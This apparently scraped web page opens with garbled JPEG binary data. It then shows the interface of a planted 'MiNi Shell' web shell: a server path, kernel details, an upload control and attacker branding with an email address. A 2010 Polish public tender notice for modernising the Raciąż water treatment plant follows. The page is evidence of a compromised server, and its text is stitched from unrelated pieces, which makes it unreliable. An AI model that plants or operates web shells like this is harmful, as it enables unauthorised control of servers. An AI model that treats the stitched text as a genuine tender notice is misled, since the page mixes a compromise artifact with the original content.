JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100714/186671-N-2010.html

<p class="kh_header"><b>Raciąż: Modernizacja Stacji Uzdatniania Wody w Raciążu</b><br>
<b>Numer ogłoszenia: 186671 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. , ul. Wolności 34, 09-140 Raciąż, woj. mazowieckie, tel. 23 6791114, faks 23 6791114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.raciaz.asi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Stacji Uzdatniania Wody w Raciążu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie - Modernizacji Stacji Uzdatniania Wody w Raciążu
Przedmiot zamówienia jest współfinansowany ze środków Programu Rozwoju Obszarów Wiej-skich 2007-2013 w ramach działania 3.2 Podstawowe usługi dla gospodarki i ludności wiejskiej .

2. Przedmiotem zamówienia jest Modernizacja Stacji Uzdatniania Wody w Raciążu w
miejscowości Witkowo, gm, Raciąż, pow. Płońsk, woj. mazowieckie. Projektowana inwestycja zlokalizowana jest w miejscowości Witkowo, na działkach o nr 11/5,  

Inwestycja ma celu modernizację układu technologicznego Stacji Uzdatniania Wody w Raciążu w celu  ujednolicenia technologii uzdatniania wody stosowanej w Gminie Raciąż oraz wzrostem wymagań jakościowych stawianym wodzie przeznaczonej do spożycia przez ludzi - Fe = 0,2 mg/l, Mn = 0,05 mg/l.

Planowany jest następujący zakres prac:
.	Zmiana technologii uzdatniania przewidująca  osiągnięcie parametrów wody uzdat-nionej zgodnie z przepisami. ( orurowanie filtrów stal nierdzewna, proces sterowany w pełni automatycznie z możliwością monitoringu)
.	Wymiana instalacji elektrycznej sterowania pompownią - automatyka.
.	Wymiana posadzki w hali głównej.
.	Malowanie hali wewnątrz
.	Wymiana obudowy dwóch studni głębinowych
.	System dezynfekcji wody
Przyjęto zastosowanie następującego układu technologicznego:
.	aeracja - napowietrzanie wody w aeratorze ciśnieniowym o czasie przetrzymania mini-mum 180 sekund, ilość powietrza 3-5% ilości wody 
.	filtracja jednostopniowa - odżelazienie i odmanganianie na złożu kwarcowym i katali-tycznym, z prędkością filtracji vf<15,0 m/h
.	retencja wody w zbiorniku retencyjnym
.	pompownia II stopnia - pompowanie wody do sieci wodociągowej



3. Wykonanie zadania obejmuje dodatkowo:

1) Wykonanie dokumentacji powykonawczej.
2) Sporządzenie planu bezpieczeństwa i ochrony zdrowia, jeżeli odrębne przepisy wymagają
sporządzenia takiego planu.
3) Dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania przedmiotu
zamówienia i przekazania go do użytku i poniesienia opłat z tym związanych.
4) Poniesienia ewentualnych kosztów wyłączeń i włączeń energii elektrycznej.
5) W przypadku zniszczeń lub uszkodzeń obiektów, urządzeń lub ich części w toku realizacji -
naprawienia szkody lub doprowadzenia do stanu pierwotnego.
6) Przywrócenie do pierwotnego stanu terenu robót z uwzględnieniem zakresu
nowopowstałych obiektów budowlanych.
7) Ponoszenie pełnej odpowiedzialności za dozór mienia na terenie robót, jak i za wszelkie
szkody powstałe w trakcie trwania robót na terenie przejętym od Zamawiającego lub mających
związek z prowadzonymi robotami w tym za szkody w majątku osób trzecich, ograniczenie
praw osób trzecich z tytułu prowadzenia robót itp.
8) Ponoszenie pełnej odpowiedzialności za szkody oraz następstwa nieszczęśliwych
wypadków pracowników i osób trzecich powstałe w zawiązku z prowadzonymi robotami w tym
także ruchem pojazdów.
9) Przeprowadzenie rozruchu technologicznego, zakończonego uzyskaniem wymaganych para-metrów,
10) Opracowanie instrukcji obsługi stacji ujęcia wody wraz z instrukcjami stanowiskowymi,
11) Przeszkolenie pracowników Użytkownika w zakresie obsługi stacji wraz ze
szkoleniami stanowiskowymi.
12) Pozostałych zadań wymienionych w niniejszej SIWZ i załącznikach.

5. Zamawiający nie zalicza niniejszego przedmiotu zamówienia do pojęcia robót o powszechnie
znanych rozwiązaniach konstrukcyjnych.

6. Całość robót zostanie wykonana zgodnie z przepisami BHP oraz Warunkami Technicznymi
Wykonania i Odbioru Robót Budowlano-Montażowych. Użyte materiały i urządzenia pod względem parametrów technicznych i jakościowych będą zgodne z projektami i zaleceniami Za-mawiającego oraz będą posiadać stosowne atesty i dopuszczenia na rynek polski.

7. Jeśli gdziekolwiek w SIWZ lub dokumentacji techniczno - projektowej o której mowa w po-wyższym ust. 4 przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający dopuszcza możliwość zastosowania urządzeń rów-noważnych w stosunku do zaprojektowanych z zachowaniem tych samych standardów technicz-nych, technologicznych i jakościowych. Przez pojęcie materiałów równoważnych należy rozu-mieć materiały gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz w przedmiarach robót.
W celu dokonania oceny technicznej oferty zastosowane urządzenia technologiczne muszą być wykazane w formie tabeli i dołączone do oferty. Koniecznym jest podanie nazwy producenta, precyzyjnego i jednoznacznego typu urządzenia. 
Zgodnie z zapisami art. 30 ust. 5 ustawy - Prawo Zamówień Publicznych, Wykonawca, który
powołuje się na rozwiązania równoważne opisane przez zamawiającego, jest obowiązany wyka-zać że ofertowane przez niego roboty budowlane i związane z tym usługi i dostawy spełniają wymagania określone przez zamawiającego.
W związku z powyższym w celu oceny technicznej wszyscy oferenci są zobowiązani załączyć do oferty karty katalogowe. Dla zestawów technologicznych: hydroforowego, aeracji i filtracji nale-ży dołączyć atesty PZH na kompletne zestawy. Nie dopuszcza się stosowania atestów PZH na poszczególne podzespoły zestawów technologicznych w zamian atestu na kompletne urządzenie.
Zastosowanie równoważnych zestawów technologicznych oznacza konieczność załączenia przez Wykonawcę do oferty następujących załączników:
a) Rysunek techniczny: rzut z góry, boku, przodu, tyłu i dołu.
b) Atest PZH na kompletny zestaw technologiczny.
c) Aprobata techniczna na kompletny zestaw technologiczny.
d) Krzywe przesiewu złóż wykonanych przez upoważnioną do tego typu badań jednostkę badaw-czą.
e) Graficzny schemat płukania filtrów.
f) Graficzny schemat instalacji sterującej.
Zamawiający nie wyraża zgody, by proponowane w ofercie urządzenia równoważne były proto-typami. Wymogiem bezwzględnym jest, by były to urządzenia sprawdzone. Wykonawca winien udokumentować, iż zaproponowane urządzenia równoważne pracują na innych 3 zrealizowanych obiektach przez okres nie krótszy niż 2 lata (na dowód pracy urządzeń równoważnych należy załączyć np.: referencje, protokoły odbioru, faktury, itp. potwierdzone za zgodność z oryginałem, potwierdzające datę uruchomienia oraz dokument potwierdzający należytą ich pracę w tym okre-sie - referencje, opinie itp.).
Zamawiający wymagać będzie od Wykonawcy, którego oferta zostanie wybrana, wykonania przedmiotu zamówienia zgodnie z opracowanym projektem, szczególnie w zakresie efektów uzdatniania wody, kosztów eksploatacji, niezawodności działania. Wykonawca musi mieć świa-domość, iż możliwość zastosowania urządzeń równoważnych uzależniona będzie od ich zgodno-ści ze wszystkimi parametrami określonymi w projekcie, specyfikacji technicznej lub lepsze. 

8. Dokumentacja, o której mowa w powyższym pkt. 4 jest załącznikiem nr 11 do SIWZ i jest dostępna wersji elektronicznej, w formie odrębnych plików do pobrania na stronie
internetowej Zamawiającego. W przypadku, gdyby Wykonawca nie posiadał dostępu do
internetu, musi to zgłosić Zamawiającemu. W takiej sytuacji dokumentacja projektowa będzie
udostępniana Wykonawcom w siedzibie Zamawiającego, lub na jego pisemny wniosek
przekazana w wersji papierowej z dokumentacją projektową w wersji elektroniczne na nośniku
CD lub DVD, łącznie z SIWZ w wersji papierowej. 

14. Przedmiot zamówienia według kodu CPV:
- 45.23.24.30-5 Roboty w zakresie uzdatniania wody
- 45.21.00.00-2 Roboty budowlane w zakresie budynków 
- 45.30.00.00-0 Roboty instalacyjne w budynkach
- 45.23.24.60-4 Roboty sanitarne,
- 45.23.13.00-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do
odprowadzania ścieków,
- 45.11.12.00-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
- 45.31.00.00-3 - Roboty instalacyjne elektryczne,
- 45.31.10.00-0 - Roboty w zakresie okablowania i instalacji elektrycznych.


15. Wykonawca, z chwilą przejęcia placu budowy zobowiązuje się do przekazania odpadów Za-mawiającemu oraz  ma obowiązek postępować zgodnie z obowiązującymi przepisami: ustawy
z 27 kwietnia 2001r. o odpadach (t.j. Dz. U. z 2007r. Nr 39, poz. 251 ze zm.) oraz ustawy
z 27 kwietnia 2001r. Prawo ochrony środowiska (t.j. Dz. U. z 2006r. Nr 129, poz. 902
ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.30-5, 45.31.00.00-3, 45.21.00.00-2, 45.30.00.00-0, 45.23.24.60-4, 45.23.13.00-8, 45.11.12.00-0, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10000zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział wykonawcy, którzy:
1. Spełniają warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 Prawo
zamówień publicznych ( tj. z 2007r.,Dz.U. Nr 223, poz. 1655 z późn. zm. - zwanej dalej Pzp),tj.:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepi-sy prawa nakładają obowiązek ich posiadania
1.2. posiadają wiedzę i doświadczenie
1.3. dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
1.4. znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają doświadczenia w zakresie realizacji robót budowlanych w zakresie objętym
przedmiotowym zamówieniem:
poprzez udokumentowanie wykonania w ciągu ostatnich pięciu lat przed dniem wszczęcia
postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie,   budowy  co najmniej dwóch  stacji uzdatniania wody  wraz z technologią (w tym rurociągi wykonane ze stali kwasoodpornej)  oraz robotami towarzyszącymi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia:
2.1. posiadają wielkość średniego rocznego zatrudnienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy w tym okresie, w wysokości co najmniej 10 pracowników 
2.2. dysponują lub będą dysponować osobami, które pełnić będą funkcję:
- kierownika budowy, posiadającą uprawnienia bez ograniczeń do kierowania robotami
budowlanymi w specjalności:
- instalacyjnej w zakresie sieci i instalacji sanitarnych zgodnych z zakresem przedmiotowego
zamówienia lub
- konstrukcyjno - budowlanej zgodnych z zakresem przedmiotowego zamówienia,
Uprawnienia w/w osób nie mogą w swojej treści zawierać jakichkolwiek ograniczeń. Osoba
przewidziana do realizacji przedmiotowego zamówienia jako kierownik budowy winna posiadać, co najmniej 5 letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi w tym jedną
budową w zakresie budowy stacji ujęcia wody o parametrach technicznych, co najmniej jak przedmiot niniejszego zamówienia,
- kierownika robót budowlanych, posiadającej uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz posiadającej, minimum 5-letenie doświadczenie w pełnieniu, co najmniej funkcji kierownika robót liczone od daty uzyskania stosownych uprawnień, Zamawiający dopuszcza łączenie funkcji kierownika budowy posiadającego uprawnienia w specjalności konstrukcyjno - budowlanej z kierownikiem robót budowlanych
- kierownika robót sanitarnych, posiadającej uprawnienia bez ograniczeń do kierowania robotami
 - z uwzględnieniem istoty postanowienia rozdz. II pkt. 5 SIWZ - budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych posiadającej udokumentowane, minimum 5-letenie doświadczenie w pełnieniu co najmniej funkcji kierownika robót liczone od daty uzyskania stosownych uprawnień. Zamawiający dopuszcza łączenie funkcji kierownika udowy posiadającego uprawnienia w specjalności instalacji i urządzeń sanitarnych z
kierownikiem robót sanitarnych,
- kierownika robót elektrycznych, posiadającej uprawnienia do kierowania robotami budowla-nymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych oraz posiadającej udokumentowane, minimum 3-letenie doświadczenie w pełnieniu, co najmniej funkcji kierownika robót liczone od daty uzyskania stosownych upraw-nień.
2.3. Wykonawca powinien dysponować osobami zdolnymi do wykonania zamówienia, którzy są obywatelami polskimi lub, jeżeli nie są obywatelami polskimi, to biegle władają jeżykiem pol-skim lub jeżeli nie są obywatelami polskimi i nie władają biegle językiem polskim, to Wykonaw-ca na własny koszt zapewni tłumacza, zapewniającego stałe i biegle tłumaczenia w kontaktach pomiędzy Zamawiającym, nadzorem inwestorskim a personelem Wykonawcy, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego za-mówienia, stworzonych zarówno przez Wykonawcę jak i dostarczanych przez Zamawiającego. Przy zatrudnieniu tłumacza należy wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia , tłumacz ten winien być biegły w bezbłędnym i jednoznacznym tłumaczeniu zagad-nień technicznych, ekonomicznych i prawnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1. Posiadają środki finansowe lub zdolność kredytową o łącznej kwocie w wysokości, co naj-mniej 500.000,00 zł.
4.2. Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia działalności
związanej z przedmiotem zamówienia.
5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdol-nych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowią-zany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
6. Nie podlegają wykluczeniu na mocy art. 24 ust. 1 Pzp.
7. Zamawiający oceni spełnienie warunków wg kryteriów spełnia lub nie spełnia. W/w warunki zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty, z treści których będzie jednoznacznie wynikać iż warunki zostały spełnione a o których mowa w rozdz. X SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.raciaz.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. Z O.O,
 ul. Wolności 34 , 09-140 Raciąż.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 10:15, miejsce: Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. Z O.O,
 ul. Wolności 34 , 09-140 Raciąż.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.08.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com